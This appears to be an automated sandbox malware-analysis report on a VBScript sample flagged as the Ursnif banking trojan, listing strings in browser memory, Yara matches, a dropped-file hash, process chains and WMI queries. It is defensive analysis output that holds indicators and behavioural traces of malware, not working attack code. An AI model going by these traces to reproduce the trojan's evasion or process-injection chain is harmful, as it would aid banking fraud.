            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.483432936.0000000000A9C000.00000004.00000020.sdmpString found in binary or memory: http://w3.or
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.19.drString found in binary or memory: http://www.reddit.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.19.drString found in binary or memory: http://www.twitter.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.19.drString found in binary or memory: http://www.wikipedia.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.19.drString found in binary or memory: http://www.youtube.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: iexplore.exe, 0000001B.00000002.482442404.0000000000A57000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/
            Source: iexplore.exe, 0000001B.00000002.484411041.0000000000AE3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.comi1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1qC/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388506771.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388360455.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388280656.0000000005888000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388506771.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388360455.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.388280656.0000000005888000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Mardi.rm D3A93385847D628EBF1FF01E9C0F1639731E4D2D63540C9A13311D172E5C4822
            Source: DGDvEtyCrEmX.vbsInitial sample: Strings found which are bigger than 50
            Source: classification engineClassification label: mal100.troj.evad.winVBS@6/28@3/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7164 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: DGDvEtyCrEmX.vbsStatic file information: File size 1363932 > 1048576
